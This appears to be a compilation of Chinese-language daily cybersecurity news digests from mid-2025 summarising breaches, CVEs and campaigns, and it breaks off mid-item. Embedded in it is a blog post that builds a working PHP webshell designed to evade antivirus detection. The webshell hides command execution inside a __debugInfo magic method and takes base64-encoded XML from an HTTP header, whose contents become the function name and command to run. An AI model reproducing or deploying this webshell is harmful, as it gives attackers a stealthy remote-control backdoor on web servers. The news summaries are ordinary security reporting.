网络安全日报 2025年07月03日
1、研究人员发现主流IDE在扩展程序验证方面存在安全漏洞 https://www.ox.security/can-you-trust-that-verified-symbol-exploiting-ide-extensions-is-easier-than-it-should-be/ 研究人员揭示了流行集成开发环境(IDE)在扩展程序验证方面存在严重安全漏洞。研究发现,Visual Studio Code、Visual Studio、IntelliJ IDEA和Cursor等平台的恶意扩展程序可以轻易绕过信任检查,尽管它们显示为“已验证”状态。研究团队创建了伪装成可信扩展的恶意程序,能够在开发者的机器上执行任意代码。通过修改服务器请求,攻击者可以让 2、FileFix新变种利用HTML应用程序绕过MOTW警报 https://mrd0x.com/filefix-part-2/ 安全研究机构发现了一种新的FileFix攻击变种,利用HTML应用程序(HTA)文件绕过Mark of the Web(MOTW)标记。当用户使用Ctrl+S或右键单击“另存为”保存HTML页面时,选择“网页,单个文件”或“网页,完整”格式会导致浏览器在文件中添加额外内容,但这些格式不会标记为MOTW。攻击者可以利用这一点,通过社会工程学手段诱导用户保存并运行包含恶意脚本的HTA文件。研究人员建议禁用mshta.exe的运行权限来阻止此类攻击。 3、Anthropic MCP漏洞致开发者面临远程攻击风险 https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596 网络安全研究人员发现人工智能公司Anthropic的模型上下文协议(MCP)检查器项目存在严重安全漏洞(CVE-2025-49596),CVSS评分为9.4。该漏洞可能导致远程代码执行(RCE),使攻击者能够完全访问主机。MCP由Anthropic于2024年11月推出,是一种开放协议,用于标准化大型语言模型(LLM)应用程序与外部数据源和工具的集成和数据共享。MCP Inspector是一个 4、澳航遭Scattered Spider入侵600万客户数据泄露 https://www.bleepingcomputer.com/news/security/qantas-discloses-cyberattack-amid-scattered-spider-aviation-breaches/ 近日,澳大利亚航空公司(澳航)披露了一起严重的网络攻击事件,威胁行为体获得了包含客户数据的第三方平台的访问权限,导致“大量”数据被盗。此次攻击始于一名威胁行为体攻击澳航呼叫中心,并获取了第三方客户服务平台的访问权限。被盗数据包括部分客户的姓名、电子邮件地址、电话号码、出生日期和常旅客会员号码,但信用卡或个人财务信息未遭泄露。此次攻击与勒索组织Scattered 5、Nessus严重漏洞允许覆盖任意本地系统文件 https://www.freebuf.com/articles/system/437519.html Tenable最新发布的安全公告披露了Nessus漏洞扫描器中存在的严重漏洞,攻击者可能通过权限提升攻击危害Windows系统。这些安全漏洞影响10.8.5之前的所有Nessus版本,包括一个关键的Windows特定漏洞(CVE-2025-36630)以及第三方组件libxml2和libxslt中的两个额外漏洞。 6、大语言模型随意猜测网址引发网络安全危机 https://www.csoonline.com/article/4015404/llms-are-guessing-website-urls-and-its-a-cybersecurity-time.html AI生成品牌网址错误率高达34%,5%指向钓鱼网站,威胁用户安全。攻击者利用AI幻觉抢注域名,GitHub投毒污染训练数据。专家建议验证域名所有权,加强数据审核,防范钓鱼攻击。 7、新型C4炸弹攻击绕过Chrome应用绑定Cookie加密机制 https://cybersecuritynews.com/chrome-c4-bomb-attack/ 研究人员发现Chrome的C4漏洞,利用Windows DPAPI填充预言漏洞解密Cookie,16小时可破解。谷歌推出临时解决方案,微软认为利用难度高。研究揭示加密机制组合风险,建议弃用CBC模式。 8、黑客利用Vercel的v0 AI工具大规模快速创建虚假登录页面 https://thehackernews.com/2025/07/vercels-v0-ai-tool-weaponized-by.html 网络安全研究人员发现黑客利用Vercel的AI工具v0快速生成高仿钓鱼网站,降低犯罪门槛。无审查大型语言模型助长犯罪,使网络钓鱼攻击更易规模化。AI正被广泛用于构建欺诈系统,威胁日益严峻。 9、国际刑事法院ICC遭遇复杂网络攻击 https://www.securityweek.com/cyberattack-targets-international-criminal-court/ 国际刑事法院(ICC)表示,黑客再次将目标对准其系统,这距离该法院上次遭到间谍组织攻击大约已有两年时间。ICC 将上周晚些时候发生的攻击描述为“一次复杂且有针对性的网络安全事件”,但没有提供更多细节。 10、TA829黑客组织采用新型TTP与升级版RomCom后门规避检测 https://cybersecuritynews.com/ta829-hackers-employs-new-ttps/ TA829组织升级RomCom后门,采用MikroTik路由器钓鱼攻击和多阶段感染链,结合注册表持久化技术,模糊网络犯罪与间谍活动界限,展现高度适应性和隐蔽性,凸显现代网络战威胁升级趋势。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月02日
1、欧洲刑警破获5.4亿美元加密货币杀猪盘 https://thehackernews.com/2025/06/europol-dismantles-540-million.html 欧洲刑警组织宣布捣毁一个跨国加密货币诈骗网络,涉案金额达约5.4亿美元。该团伙通过"杀猪盘"骗局诱骗全球超5000名受害者,利用虚假投资平台和社交工程手段敛财。西班牙警方在加那利群岛和马德里逮捕5名核心成员,爱沙尼亚、法国和美国执法机构协同参与行动。调查显示,犯罪集团通过约会软件建立信任后诱导受害者注资,使用多层账户转移赃款以逃避追踪。其洗钱网络涉及香港空壳公司、加密货币交易所及人工骡子账户。欧洲刑警组织指出,此类犯罪正借助AI技术升级话术,东南亚诈骗园 2、加拿大以国家安全为由下令海康威视停止在该国运营 https://www.anquanke.com/post/id/309186 加拿大政府官员于周五表示,“出于国家安全考量,中国视频监控设备制造商海康威视(Hikvision)必须在加拿大停止运营”。这是西方国家对部分国有的杭州海康威视数字技术有限公司生产的设备实施的一系列禁令中的最新一项。 3、时代终结:微软替换标志性“蓝屏死机”界面 https://www.anquanke.com/post/id/309218 微软将逐步停用使用数十年的蓝色“死机界面”(Blue Screen of Death, BSOD),并正式启用一种全新的黑色崩溃界面。这一变化是其“Windows 弹性计划”(Windows Resiliency Initiative,WRI)的一部分,微软明确表示:“弹性不是可选项,而是一项战略任务。” 4、关键 Sudo 漏洞可实现本地提权与主机访问绕过 https://www.anquanke.com/post/id/309228 根据 Stratascale 网络研究单位(CRU)研究员 Rich Mirch 最新发布的安全通告,Sudo 中存在两个严重漏洞:CVE-2025-32463 和 CVE-2025-32462。这些漏洞长期潜伏在这个世界上最值得信赖的提权工具中,允许攻击者绕过 sudoers 配置限制,实现本地提权至 root,即使这些用户在配置中被明确拒绝了该权限。 5、德国监管机构下令苹果、谷歌下架DeepSeek应用 https://www.anquanke.com/post/id/309238 近期,德国数据监管机构命令苹果和谷歌将中国人工智能应用DeepSeek从其在线应用商店中下架,原因是该应用未遵守欧洲的隐私和数字服务相关法规。 6、Blind Eagle通过Proton66托管服务攻击拉美金融机构 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tracing-blind-eagle-to-proton66/ 安全机构发现Blind Eagle(APT-C-36)与俄罗斯托管服务提供商Proton66存在关联。Blind Eagle主要针对拉丁美洲组织,尤其是哥伦比亚金融机构。研究人员通过追踪Proton66相关资产,发现了依赖相同基础设施的活跃威胁集群。该集群利用VBS文件作为初始攻击向量,依赖DDNS服务,并部署RAT作为第二阶段恶意软件。研究人员发现,这些恶意软件样本与Vbs-Crypter生成的样本 7、Snake键盘记录器利用地缘政治紧张局势发动攻击 https://lab52.io/blog/snake-keylogger-in-geopolitical-affairs-abuse-of-trusted-java-utilities-in-cybercrime-operations/ 网络安全机构集团近日披露一起针对全球石油行业的攻击活动。攻击者利用经过篡改的Java调试工具jsadebugd.exe,通过伪装成哈萨克斯坦石油公司的鱼叉式钓鱼邮件传播Snake Keylogger恶意软件。研究人员指出,此次攻击正值中东局势紧张时期,可能与霍尔木兹海峡航运安全引发的全球油价波动有关,攻击者可能试图获取能源贸易敏感数据。值得注意的是,这是首 8、WordPress网站藏匿PHP后门传播Windows木马 https://blog.sucuri.net/2025/06/stealthy-wordpress-malware-drops-windows-trojan-via-php-backdoor.html 安全研究人员近日披露一起针对WordPress网站的供应链攻击。攻击者通过篡改header.php等核心文件植入后门,构建了包含IP过滤、混淆脚本下载和多阶段载荷投放的复杂攻击链。该攻击具有高度隐蔽性,采用IP轮询机制规避检测,代码混淆技术增加分析难度。安全专家建议网站管理员部署WAF并监控文件完整性,终端用户需警惕异常文件下载。目前相关IOC已提交至威胁情报平台。 9、美国警告伊朗将升级对关键基础设施网络攻击 https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html 美国网络安全和基础设施安全局(CISA)、联邦调查局(FBI)、国家安全局(NSA)等机构联合发布警告,称伊朗政府支持的黑客组织正加大对美国及以色列国防、工业控制系统(OT)和关键基础设施的网络攻击。攻击者利用未修复漏洞、默认密码及自动化工具入侵目标,并可能发起DDoS、勒索软件攻击。报告指出,伊朗黑客频繁使用Shodan扫描暴露的ICS设备,结合远程访问工具(RAT)、密码破解技术横向渗透。近期APT35组织还针对以色列记者、学者发起钓鱼攻击。 10、瑞士非营利组织Radix遭勒索攻击联邦政府数据外泄 https://www.news.admin.ch/en/newnsb/T5AZeWNEPFGe 2025年6月30日,瑞士健康促进组织Radix基金会确认遭受重大勒索软件攻击,导致包括联邦政府相关部门数据在内的敏感信息被窃取并加密。攻击者已将部分数据发布于暗网进行勒索。Radix作为多家联邦机构的服务提供商,其系统存储有政府相关数据,但官方强调攻击者未直接入侵联邦政府内部系统。瑞士国家网络安全中心(NCSC)已介入调查,正协调检察机关及相关政府部门评估数据泄露影响范围。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年07月01日
1、前北约网络安全专家表示伊朗可能发起供应链攻击 https://www.theregister.com/2025/06/28/exnato_hacker_ceasefire_iran/ 前北约网络安全专家、现任Black Kite公司CTO Candan Bolukbas近日在接受采访时强调,即使伊朗与以色列达成暂时停火协议,网络空间的对抗仍在持续。他指出:“在网络世界里,没有所谓的停火。”Bolukbas曾为北约执行反网络恐怖主义任务,最后一次任务是模拟攻击乌克兰关键电网。他通过供应链切入,仅用一个漏洞供应商,就几乎完全控制了电网系统。此经历也让他高度警惕目前伊朗针对美以基础设施的潜在攻击路径。他预计,伊朗不太可能直接攻破五角大楼或NS 2、黑客可利用蓝牙芯片漏洞进行远程窃听 https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/ 网络安全研究人员近日披露,一种广泛用于真无线音频设备的蓝牙芯片存在严重漏洞,攻击者可借此在蓝牙范围内实施窃听、读取通话记录,甚至操控设备拨打电话。该漏洞影响了29款由10家知名厂商生产的耳机、音箱和无线麦克风设备,涉及品牌包括Bose、Sony、Jabra、JBL、Marshall、Beyerdynamic等。研究人员利用上述漏洞成功构造PoC攻击代码,能够在未经授权的情况下 3、Facebook新AI功能请求用户上传相册引发隐私担忧 https://thehackernews.com/2025/06/facebooks-new-ai-tool-requests-photo.html Meta公司近期在Facebook推出一项新AI功能,提示用户允许其上传手机相册中的照片到云端,用于生成故事拼图、回顾视频等内容建议。该功能虽然标榜“仅用户可见”、“不用于广告定向”,但业内专家和隐私倡导者普遍担心,这种做法可能进一步侵蚀用户的数据主权。据TechCrunch报道,美国和加拿大的部分用户在创建Facebook Story时,收到一则弹窗,询问是否同意“允许云处理”。Meta在弹窗中表示,系统会基于时间、地点或主题等信息持续上传 4、Cloudflare为其视频通话应用引入端到端加密技术 https://www.bleepingcomputer.com/news/security/cloudflare-open-sources-orange-meets-with-end-to-end-encryption/ Cloudflare近日宣布,为其视频通话应用Orange Meets引入端到端加密(E2EE)机制,并将该方案以开源形式发布,旨在提升通信安全性与协议透明度。虽然该应用初始作为“Cloudflare Calls”(现更名为Realtime)的一部分推出,主要面向技术演示用途,但此次的安全升级使其成为具备高加密保障的视频通话研究平台。Orange Meets基于IETF标 5、NFC正成网络犯罪新目标,恶意攻击数量半年激增35倍 https://www.freebuf.com/articles/database/437184.html 一种针对近场通信(NFC)支付系统的复杂新型恶意软件活动已演变为重大全球网络安全威胁。该攻击最初仅在东欧地区出现,如今已发展为全球性现象。ESET研究人员于2023年底首次在捷克银行客户中发现这一恶意活动,目前其已高效扩散至多个大洲。威胁呈现爆发式增长,ESET遥测数据显示,与2024年下半年相比,2025年上半年NFC相关攻击数量激增35倍。 6、Chrome紧急修复已被利用的零日漏洞CVE-2025-6554 https://www.freebuf.com/articles/web/437229.html 谷歌在发现一个已被野外利用的高危零日漏洞(CVE-2025-6554)后,紧急为其Chrome浏览器的稳定版通道发布了更新。该漏洞被归类为V8 JavaScript引擎中的类型混淆漏洞,对Windows、macOS和Linux平台的用户构成严重威胁。 7、群晖ABM漏洞泄露全局客户端密钥危及所有微软365租户 https://securityonline.info/synology-abm-flaw-cve-2025-4679-leaks-global-client-secret-exposing-all-microsoft-365-tenants/ 群晖ABM软件存在严重漏洞(CVE-2025-4679),泄露全局客户端密钥,攻击者可无认证访问企业微软365数据,包括Teams、Outlook等。群晖低估风险,未提供充分预警。 8、挪威水坝遭网络攻击 闸门被非法开启数小时 https://hackread.com/norwegian-dam-valve-forced-open-hours-in-cyberattack/ 挪威水坝遭黑客入侵,闸门被非法开启四小时,暴露控制系统弱密码隐患。虽未造成危险,但凸显关键基础设施安全漏洞风险,警示需加强身份验证和实时监控,采用强密码等多重防护措施。 9、微软暗示将逐步撤销安全软件对Windows内核访问权限 https://www.csoonline.com/article/4014241/microsoft-hints-at-revoking-access-to-the-windows-kernel-eventually.html 微软探索用户模式下提供内核级安全功能,计划限制第三方内核访问,以提升系统可靠性。此举将要求安全厂商重构产品,但微软采取渐进策略安抚行业。内核访问矛盾在于安全与风险并存,微软最终可能完全封锁内核权限。 10、荷兰零售巨头Ahold Delhaize数据泄露事件影响超220万人 https://securityaffairs.com/179448/data-breach/ahold-delhaize-data-breach-affected-over-2-2-million-individuals.html 荷兰零售巨头Ahold Delhaize遭勒索攻击,220万人信息泄露,含社保号、银行账号等敏感数据。Inc Ransom组织宣称窃取6TB数据,因未支付赎金公开800GB。公司提供两年信用监控服务。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
这你敢信,复习PHP意外搞出一个免杀WebShell
前言 正当我饶有性质的开始复习 PHP 开发这个课程准备一天速通期末考试的时候,没想到有心栽花花不开,无心插柳柳成因,意外灵感突发,搞出了一个还算可以的免杀的 webshell,下面讲讲思路 起 当打开 php 复习考点的时候,发现还要考魔术方法,于是打开了好久没有翻过的 php 手册 魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖 PHP 的默认操作。 我们看了大多数魔术方法,都有自己会在某个契机出发 比如一些常规的 __construct(mixed ...$values = ""): void PHP 允许开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新对象时先调用此方法,所以非常适合在使用对象之前做一些初始化工作。 会在实例化一个类的时候触发这个方法 __destruct(): void PHP 有析构函数的概念,这类似于其它面向对象的语言,如 C++。析构函数会在到某个对象的所有引用都被删除或者当对象被显式销毁时执行。 会在对象销毁的时候执行这个方法 于是我们可以利用这个思路来实现一个命令条件执行的方法 比如看下面的例子 <?php class a{    public function __construct()   {        system("calc");   } } new a(); 或者 <?php class a{    public function __destruct()   {        system("calc");   } } new a(); 都可以弹出计算器 所以我们可以借助这个思路 但是这两个函数还是太常见了 我们找找其他函数 承 于是开始找起来了 手册的方法都感觉太常规,而且都见过 首先需要免杀,那一定需要小众 不知道各位知不知道__debugInfo()这个魔术方法呢 下面介绍一下 __debugInfo(): array 当通过 var_dump() 转储对象,获取应该要显示的属性的时候,该函数就会被调用。如果对象中没有定义该方法,那么将会展示所有的公有、受保护和私有的属性。 下面是它的使用例子 <?php class C {    private $prop;    public function __construct($val) {        $this->prop = $val;   }    public function __debugInfo() {        return [            'propSquared' => $this->prop ** 2,       ];   } } var_dump(new C(42)); ?> 我们按着改造一下 读懂了原理后我们尝试看看能不能执行命令 <?php class C {    private $prop;    public function __construct($val) {        $this->prop = $val;   }    public function __debugInfo() {        return [            'propSquared' => $this->prop ** 2,       ];        system("calc");   } } var_dump(new C(42)); ?> 但是并没有计算器弹出来,原来忘了 php 一个最基础的语法,return 后代码就不会执行了 但是尝试了还是不行,最后问 GPT 写了个例子看看环境是不是有问题 <?php class User {    private $username;    private $password; // 敏感信息,不想输出    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); // 触发 __debugInfo() 输出应该是 object(User)#1 (3) { ["username"]=>  string(5) "alice" ["info"]=>  string(33) "这是调试时返回的信息" ["timestamp"]=>  int(1725092384) } 然后搜了很多,发现如果可能我们的 xdebug 配置会影响我们的这个输出,所以找了没有配置 xdebug 的 再次执行 可以看到已经有信息了 所以尝试执行命令 成功执行了命令 然后开始构造免杀 webshell 利用 SimpleXMLElement 解析 xml 文件来传入参数 终 最后搞出来的代码如下 <?php class User {    private $username;    private $password;    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        $xmlData = base64_decode(end(getallheaders()));        $xmlElement = new SimpleXMLElement($xmlData);        $namespaces = $xmlElement->getNamespaces(TRUE);        $xmlElement->rewind();        var_dump($xmlElement->key());        $result = $xmlElement->xpath('/books/system');        var_dump (($result[0]->__toString()));       ($xmlElement->key())($result[0]->__toString());        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); 这里因为我懒得搭建调试环境了,我们把 header 传入的值直接设置为 <books>    <system>calc</system> </books> 然后需要 base64 编码 <?php class User {    private $username;    private $password;    public function __construct($username, $password) {        $this->username = $username;        $this->password = $password;   }    public function __debugInfo() {        $xmlData = base64_decode("PGJvb2tzPgogICAgPHN5c3RlbT5jYWxjPC9zeXN0ZW0+CjwvYm9va3M+");        $xmlElement = new SimpleXMLElement($xmlData);        $namespaces = $xmlElement->getNamespaces(TRUE);        $xmlElement->rewind();        var_dump($xmlElement->key());        $result = $xmlElement->xpath('/books/system');        var_dump (($result[0]->__toString()));         ($xmlElement->key())($result[0]->__toString());        return [            'username' => $this->username,            'info' => '这是调试时返回的信息',            'timestamp' => time()       ];   } } $user = new User('alice', 'secret123'); var_dump($user); 成功弹出计算器 这里我为了方便直接把从 header 头传入值修改为直接写入了 首先实例化我们的 user 类 然后 var_dump($user); 在这个过程中,会触发__debugInfo 然后在这个过程中会解析 xml 数据 通过 SimpleXMLElement 的方法去截取我们需要的字符串,从而来构造一个命令执行 最后构造出我们的 webshell 长亭 微步 VIRUSTOTAL
网络安全日报 2025年06月30日
1、朝鲜黑客组织利用35个npm软件包传播恶意软件 https://socket.dev/blog/north-korean-contagious-interview-campaign-drops-35-new-malicious-npm-packages Socket安全研究团队披露,朝鲜黑客组织“Contagious Interview”近期再度发动供应链攻击,投放35个恶意npm软件包,并利用LinkedIn冒充招聘人员诱导开发者执行多阶段恶意代码。这一行动与早前披露的“Contagious Interview”社工攻击活动相一致,目标为正在求职的开发者群体。此次攻击中,黑客通过24个npm账号上传带有HexEval加载器的恶意包,并成 2、黑客利用ClickOnce与AWS服务发起攻击行动 https://www.bleepingcomputer.com/news/security/oneclik-attacks-use-microsoft-clickonce-and-aws-to-target-energy-sector/ 安全公司Trellix近日揭露一项名为“OneClik”的复杂攻击行动,攻击者利用微软ClickOnce部署技术及亚马逊云服务,配合Golang后门“RunnerBeacon”,针对能源、石油和天然气等关键行业展开隐蔽攻击。此行动自2023年已有前兆,于2025年3月起持续活跃,具备高度隐匿性及沙箱逃避能力。攻击链始于钓鱼邮件,诱导受害者点击托管于Azur 3、黑客利用Microsoft 365的“Direct Send”功能实施钓鱼攻击 https://www.bleepingcomputer.com/news/security/microsoft-365-direct-send-abused-to-send-phishing-as-internal-users/ 安全公司Varonis发现,一场自2025年5月起发起的广泛钓鱼攻击活动正在利用Microsoft 365的“Direct Send”功能,通过仿冒公司内部邮件欺骗用户并窃取凭证。Direct Send原本是为打印机、扫描仪等设备设计的邮件发送机制,允许通过企业的SMTP智能主机发送邮件而无需身份验证。然而,这一机制的安全隐患正被攻击者利用,其发出的邮件可绕过SP 4、CISA确认攻击者正利用AMI MegaRAC漏洞进行攻击 https://securityaffairs.com/179354/security/u-s-cisa-adds-ami-megarac-spx-d-link-dir-859-routers-and-fortinet-fortios-flaws-to-its-known-exploited-vulnerabilities-catalog.html 美国网络安全与基础设施安全局(CISA)近日将三个已被广泛利用的高危漏洞新增至其“已知被利用漏洞”(KEV)目录,包括AMI MegaRAC SPx身份验证绕过漏洞(CVE-2024-54085)、D-Link DIR-859路由器路径遍历漏洞( 5、全球数百款打印机曝出安全漏洞且无法通过固件修复 https://www.bleepingcomputer.com/news/security/brother-printer-bug-in-689-models-exposes-default-admin-passwords/ 据Rapid7研究人员披露,Brother品牌多达689款打印机存在一个严重漏洞(CVE-2024-51978),允许远程攻击者基于序列号推算出设备的默认管理员密码,从而接管打印机。更令人担忧的是,该漏洞无法通过固件更新修复,因其源于硬件制造时的密码生成逻辑。该漏洞是Rapid7历时研究Brother硬件时发现的8个漏洞之一,其密码生成算法使用设备序列号加静态“盐”值 6、Cisco网络访问控制平台存在两个远程代码执行漏洞 https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-rce-flaws-in-identity-services-engine/ Cisco近日发布安全公告,披露其网络访问控制平台Identity Services Engine(ISE)以及Passive Identity Connector(ISE-PIC)中存在两个严重的远程代码执行(RCE)漏洞,编号为CVE-2025-20281与CVE-2025-20282,CVSS评分均为最高的10.0。CVE-2025-20281漏洞源于公开API 7、攻击者伪造DocuSign电子邮件进行网络钓鱼 https://www.malwarebytes.com/blog/news/2025/06/fake-docusign-email-hides-tricky-phishing-attempt 近日有研究者披露了一起巧妙的仿冒DocuSign钓鱼攻击案例,该攻击通过合法渠道绕过常规安全检测,并借助Webflow网站预览功能隐藏恶意跳转行为。攻击者发送一封来自“可信联系人”的DocuSign签署通知邮件,邮件成功通过了SPF、DKIM和DMARC认证,极具迷惑性。邮件中的“查看文档”链接实际指向Webflow的预览地址,这一合法的页面初看无异常,但随后跳转至伪造的DocuSign风格界面,点击 8、APT42黑客组织针对以色列学者发起钓鱼攻击 https://securityaffairs.com/179372/apt/apt42-impersonates-cyber-professionals-to-phish-israeli-academics-and-journalists.html 以色列安全公司Check Point近日发布报告称,伊朗背景的APT42(又名Educated Manticore、Charming Kitten、Mint Sandstorm)近期针对以色列记者、网络安全专家及学术人员发起了一波精准的钓鱼攻击行动。该行动自2025年1月起持续至今,于6月中旬加剧,攻击者伪装成网络安全从业者,通过电子邮件和Wh 9、研究人员发现超过7000个MCP服务器因配置错误存在安全风险 https://www.govinfosecurity.com/misconfigured-ai-servers-weak-configurations-expose-data-systems-a-28853 安全公司Backslash Security警告称,全球已有超过7000台Model Context Protocol(MCP)服务器因配置不当而暴露在公共互联网中,给AI应用程序带来严重安全隐患。MCP协议自2023年11月才刚出现,但因其能将AI模型连接至组织内部敏感数据,部署速度惊人,目前全球部署数量已超过15000台。研究人员指出,大量MCP服务器缺乏认证控制机制,允许未经授权 10、NRS黑客攻击事件已影响超过50万名患者 https://www.govinfosecurity.com/nationwide-recovery-service-hack-grows-to-500000-victims-a-28835 2024年针对美国医疗债务催收公司Nationwide Recovery Service(NRS)的黑客攻击事件持续发酵,受影响的患者人数已超过50万。NRS最初于去年9月向美国卫生与公众服务部(HHS)报告称,事件影响仅为501人,但随着多个合作医疗机构陆续提交数据泄露报告,实际受害规模大幅攀升。近期,包括Select Medical(11.9万人)、UChicago Medicine Medica 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月27日
1、攻击者伪造SonicWall VPN窃取用户登录凭证 https://www.govinfosecurity.com/hackers-using-malicious-sonicwall-vpn-for-credential-theft-a-28815 SonicWall官方6月23日警告称,攻击者正在通过伪造的NetExtender客户端传播植入了木马程序的版本,以窃取用户的VPN登录凭据并将其发送至远程服务器。这一攻击行为利用了钓鱼网站和伪造软件签名手段,具有高度欺骗性与威胁性。根据SonicWall发布的通告,攻击者构建了仿冒官网页面,诱导用户下载名为NetExtender 10.3.2.27的“最新版本”安装程序。该版本被注入了恶意代码, 2、攻击者利用Trezor官方客服系统实施钓鱼攻击 https://www.bleepingcomputer.com/news/security/trezors-support-platform-abused-in-crypto-theft-phishing-attacks/ Trezor官方近日发出警告:攻击者正在利用其自动化支撑平台,通过伪装成官方邮件发送紧急通知,诱导用户访问钓鱼网站并交出加密钱包的助记词,进而窃取其数字资产。这波攻击利用了Trezor网站的漏洞:任何人都可以用任意邮箱地址和主题创建工单,系统随后会以mailto:help@trezor.io的官方邮箱地址自动回复,并使用攻击者设置的钓鱼主题作为邮件标题。例如,攻击者填写 3、Citrix警告NetScaler漏洞可能被黑客用于DoS攻击 https://www.theregister.com/2025/06/25/citrix_netscaler_critical_bug_exploited/ 近日,Citrix发布安全公告,警告其NetScaler设备存在的严重漏洞CVE-2025-6543正被积极利用。该漏洞可被远程未认证攻击者触发,导致设备陷入拒绝服务(DoS)状态。漏洞影响版本包括NetScaler ADC和Gateway的多个版本,特别是配置为VPN或AAA虚拟服务器的实例。Citrix指出,攻击者已针对未修补的设备展开攻击。该漏洞被内部编号为CTX694788,其本质为内存溢出漏洞。此漏洞披露恰逢另一个严重漏洞C 4、Mainline Health遭攻击导致超10万人信息泄露 https://securityaffairs.com/179322/data-breach/mainline-health-systems-disclosed-a-data-breach.html Mainline Health Systems近日披露一起重大数据泄露事件,涉及101104名个人的敏感信息。该机构是一家成立于1978年的非营利联邦合格医疗中心,总部位于阿肯色州波特兰,在东南阿肯色州设有超过30个服务点,提供综合性的基础医疗、牙科及行为健康服务。据通报,该安全事件发生于2024年4月10日,攻击者入侵了机构的公司网络。Mainline在发现异常后立即展开内部调查,并通报了联邦 5、AI聊天机器人Xbow登顶HackerOne漏洞赏金排行榜 https://www.csoonline.com/article/4012801/the-top-red-teamer-in-the-us-is-an-ai-bot.html AI聊天机器人Xbow登顶HackerOne漏洞赏金排行榜,发现超1000个安全漏洞,表现超越人类黑客。专家警告AI加速漏洞利用将加剧网络安全威胁,呼吁防御者提升自动化应对能力,适应AI驱动的攻击新时代。 6、新型BRAODO窃密木马滥用GitHub托管载荷以规避检测 https://cybersecuritynews.com/new-braodo-stealer-campaign-abuses-github/ ANY.RUN发现BRAODO窃密木马利用GitHub托管载荷,采用多层混淆和分阶段投递技术,规避检测。攻击链包括BAT启动、GitHub下载、持久化植入及Python最终载荷执行。建议加强行为监控和沙箱分析,应对新型威胁。 7、Quest修复KACE SMA严重漏洞 含CVSS 10分高危漏洞 https://securityonline.info/quest-patches-critical-kace-sma-flaws-including-cvss-10-authentication-bypass/ Quest Software紧急修复KACE SMA四大高危漏洞,包括CVSS 10.0满分认证绕过漏洞,攻击者可完全控制系统。其他漏洞涉及双因素认证绕过、恶意文件上传和许可证替换。建议用户立即更新受影响版本(14.1及以下)以防范风险。 8、Realtek蓝牙配对漏洞可导致攻击者发起拒绝服务攻击 https://cybersecuritynews.com/realtek-vulnerability-let-attackers-trigger-dos-attack/ Realtek RTL8762E SDK v1.4.0存在蓝牙配对协议漏洞,攻击者可利用未验证的配对随机数数据包触发拒绝服务,破坏安全连接。修复需强制消息顺序验证并更新固件。 9、WhatsApp推出AI消息摘要功能 提升聊天预览效率 https://thehackernews.com/2025/06/whatsapp-adds-ai-powered-message.html WhatsApp推出AI消息摘要功能,利用Meta AI技术私密汇总未读消息,支持高级隐私设置,通过隐私处理技术确保数据安全,目前仅限美国用户使用。 10、nOAuth漏洞曝光两年后仍影响9%的微软Entra SaaS应用 https://thehackernews.com/2025/06/noauth-vulnerability-still-affects-9-of.html 微软Entra ID的nOAuth漏洞仍威胁9%的SaaS应用,攻击者可劫持账户并渗透Microsoft 365。开发者需正确实施身份验证,微软强调必须使用唯一标识符。Kubernetes配置错误同样带来AWS凭证泄露风险,凸显最小权限原则重要性。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年06月26日
1、SparkKitty间谍软件伪装成热门应用窃取用户图片 https://securelist.com/sparkkitty-ios-android-malware/116793/ 近日,卡巴斯基(Kaspersky)研究人员披露一项重大安全威胁:名为SparkKitty的新型间谍软件已成功渗透苹果App Store和谷歌Play Store,主要通过伪装成热门应用传播,并广泛窃取用户手机中的图片,重点寻找与加密货币相关的信息。攻击者通过伪造如TikTok的改版应用进行传播,有些还附带虚假购物功能“TikToki Mall”,鼓励用户用加密货币进行消费,进一步诱导用户上传照片或截图,其中可能包含助记词、私钥等敏感信息。Android平台方面,Spa 2、新的FileFix攻击利用Windows文件资源管理器执行恶意命令 https://www.bleepingcomputer.com/news/security/filefix-attack-weaponizes-windows-file-explorer-for-stealthy-powershell-commands/ 安全研究员mr.d0x披露一种名为FileFix的新型社交工程攻击手法,该方法利用Windows文件资源管理器(File Explorer)的地址栏执行恶意命令,是ClickFix攻击的变种,攻击路径更隐蔽、更具迷惑性,未来可能被大量威胁行为体采用。传统的ClickFix攻击通常依赖浏览器,将恶意命令复制到剪贴板,再诱导用户通过“运行”对 3、谷歌等主流AI平台擅自共享用户个人信息 ,用户掌控权严重缺失 